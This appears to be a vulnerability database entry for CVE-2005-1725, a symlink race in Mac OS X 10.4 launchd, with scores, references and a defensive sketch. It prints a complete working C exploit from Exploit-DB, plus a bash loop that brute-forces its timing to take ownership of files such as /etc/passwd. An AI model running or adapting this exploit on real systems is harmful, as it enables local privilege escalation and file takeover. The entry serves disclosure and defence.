CVE-2005-1725 : Detail

CVE-2005-1725

0.16%V4
Local
2005-06-14
02h00 +00:00
2016-10-17
11h57 +00:00

CVE Descriptions

launchd 106 in Apple Mac OS X 10.4.x up to 10.4.1 allows local users to overwrite arbitrary files via a symlink attack on the socket file in an insecure temporary directory.

CVE Information

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 2.1 | | AV:L/AC:L/Au:N/C:N/I:P/A:N | nvd@nist.gov |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is thus used to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 1043

Publication date : 2005-06-13 22h00 +00:00
Author : intropy
EDB Verified : Yes

```c
/*
 * Mac OS X 10.4 launchd race condition exploit
 *
 * intropy (intropy <at> caughq.org)
 */

/* .sh script to help with the offsets /str0ke
#!/bin/bash

X=1000
Y=3000
I=1

while ((1))
do
    ./CAU-launchd /etc/passwd $X

    if [ $I -lt 30 ]
    then
        ((X=$X+$Y))
        ((I=$I+1))
    else
        X=1000
        I=1
    fi
done
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define DEBUG 0
#define SLEEP 6000

main(int argc, char *argv[])
{
    pid_t pid;
    int count, sleep = SLEEP;
    char name[100];
    char target[100];
    struct stat *stats = (struct stat *)malloc(sizeof(struct stat));

    if ( argc < 2) {
        fprintf(stderr, "%s <file to 0wn>\n", argv[0]);
        exit(-1);
    } else if ( argc > 2 ) {
        sleep = atoi(argv[2]);
        strncpy(target, argv[1], sizeof(target)-1);
    } else {
        strncpy(target, argv[1], sizeof(target)-1);
    }

    if ( DEBUG ) printf("Going for %s\n", target);
    if ( DEBUG ) printf("Using usleep %d\n", sleep);

    pid = fork();

    if ( pid == 0 ) {
        if ( DEBUG ) {
            system("/sbin/launchd -v /bin/ls -R /var/launchd/ 2>/dev/null");
        } else {
            system("/sbin/launchd -v /bin/ls -R /var/launchd/ >/dev/null 2>&1");
        }
    } else {
        snprintf(name, sizeof(name)-1, "/var/launchd/%d.%d/sock", getuid(), pid+2);
        if ( DEBUG ) printf("Checking %s\n", name);
        usleep(sleep);
        if ( DEBUG ) printf("Removing sock...\n");
        if ( (unlink(name)) != 0 ) {
            if ( DEBUG ) perror("unlink");
        } else {
            if ( (symlink(target, name)) != 0 ) {
                if ( DEBUG ) perror("symlink");
            } else {
                if ( DEBUG ) printf("Created symlink %s -> %s...\n", name, target);
            }
        }
        stat(target, stats);
        if ( stats->st_uid == getuid() ) {
            printf("Looks like we got it\n");
            usleep(10000000);
        }
    }
}

// milw0rm.com [2005-06-14]
```
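The exploit above depends on a socket path that the local user can unlink and replace with a symlink before a privileged process touches it again. The following defender-side sketch is an added example, not Apple's fix and not code from the original page; its function names are hypothetical. It shows the general pattern that closes this kind of race: pin the directory by descriptor only after checking its owner and mode, then operate on the socket with no-follow calls.

```c
/* Added example (not Apple's fix); all function names are hypothetical. */
#define _DEFAULT_SOURCE 1   /* glibc: expose the POSIX.1-2008 *at() calls */
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <unistd.h>

/* Open dir only if it is a real directory (not a symlink), owned by `owner`,
 * and not writable by group or other. Returns a directory fd, or -1. */
int open_private_dir(const char *dir, uid_t owner)
{
    struct stat st;
    int fd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || st.st_uid != owner ||
        (st.st_mode & (S_IWGRP | S_IWOTH)) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Change ownership of `name` inside dirfd only if it is a socket.
 * AT_SYMLINK_NOFOLLOW: a symlink swapped in for it is never dereferenced. */
int chown_socket_at(int dirfd, const char *name, uid_t uid, gid_t gid)
{
    struct stat st;
    if (fstatat(dirfd, name, &st, AT_SYMLINK_NOFOLLOW) != 0)
        return -1;
    if (!S_ISSOCK(st.st_mode))
        return -1;                 /* symlink, regular file, ...: refuse */
    return fchownat(dirfd, name, uid, gid, AT_SYMLINK_NOFOLLOW);
}

/* Constructed fixture for trying the checks: bind a UNIX socket at `path`. */
int make_socket(const char *path)
{
    struct sockaddr_un sa = { .sun_family = AF_UNIX };
    int s = socket(AF_UNIX, SOCK_STREAM, 0);
    strncpy(sa.sun_path, path, sizeof(sa.sun_path) - 1);
    return (s >= 0 && bind(s, (struct sockaddr *)&sa, sizeof(sa)) == 0) ? s : -1;
}
```

A privileged daemon would pass its own uid as `owner`, so a directory the requesting user controls is rejected before any socket is created in it.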

Products Mentioned

Configuration 0

Apple>>Mac_os_x_server >> Version 10.4

Apple>>Mac_os_x_server >> Version 10.4.1

References

http://marc.info/?l=bugtraq&m=111833509424379&w=2
Tags : mailing-list, x_refsource_BUGTRAQ